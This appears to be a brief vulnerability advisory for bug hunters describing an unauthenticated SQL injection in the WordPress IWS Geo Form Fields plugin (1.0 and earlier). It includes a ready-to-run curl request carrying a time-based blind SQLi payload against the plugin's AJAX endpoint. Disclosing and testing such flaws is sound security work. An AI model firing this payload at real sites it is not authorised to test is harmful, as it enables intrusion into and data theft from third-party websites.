Bug Name: WordPress IWS Geo Form Fields <=1.0 - SQL Injection
Severity:
critical
Priority: P1
Risk Level: CRITICAL - 10/10
CVSS Score: 9.8
Description:
WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
Exploit Commands
Bash
curl -i -s -k -X 'POST' \
'https://example.com/wp-admin/admin-ajax.php?action=iws_gff_fetch_states' \
-H '@timeout: 15s' \
-H 'Host: example.com' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)' \
--max-time 15
⚠️ Warning: These commands are for authorized security testing only. Unauthorized access is illegal.
Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!
